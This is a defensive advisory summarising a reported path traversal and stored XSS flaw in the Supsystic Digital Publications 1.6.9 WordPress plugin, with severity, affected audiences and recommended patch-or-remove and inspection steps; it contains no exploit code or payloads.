CVE-2020-37245 Downloads CVE debrief

Who should care

WordPress administrators, managed hosting teams, and security responders responsible for sites using Supsystic Digital Publications 1.6.9 should care most. Reviewers of publication-editing workflows should also pay attention because the issue can both expose files and persist malicious script content.

Technical summary

The supplied NVD record and linked references describe a path traversal flaw in the Folder input field that allows directory traversal sequences to escape the intended web-root boundary. The same plugin also fails to sanitize publication settings fields, enabling stored XSS through parameters such as Area Width and Publication Width. NVD maps the issue to CWE-79 and assigns a HIGH severity score of 8.7.

Defensive priority

High. The issue is network-reachable and can lead to sensitive file access plus persistent script injection in publication views or edit flows, so affected deployments should be treated as urgent patch-or-remove candidates.

Recommended defensive actions

• Identify any WordPress sites running Supsystic Digital Publications 1.6.9 and treat them as exposed until verified otherwise.
• Upgrade to a fixed version if the vendor provides one; if no safe version is available, disable or remove the plugin.
• Review publication settings and Folder-related inputs for unexpected traversal strings or stored script content.
• Inspect affected sites for unauthorized file reads, altered publication settings, and signs of stored XSS in rendered publications.

Evidence notes

Evidence in the supplied corpus comes from the NVD modified record and its listed references. The record states Supsystic Digital Publications 1.6.9 has a Folder-input path traversal issue and unsanitized publication settings leading to stored XSS, with CWE-79 listed as the primary weakness. The supplied CVE published and modified timestamps are 2026-05-16T16:16:20.867Z, and the enrichment does not mark this as KEV.

Official resources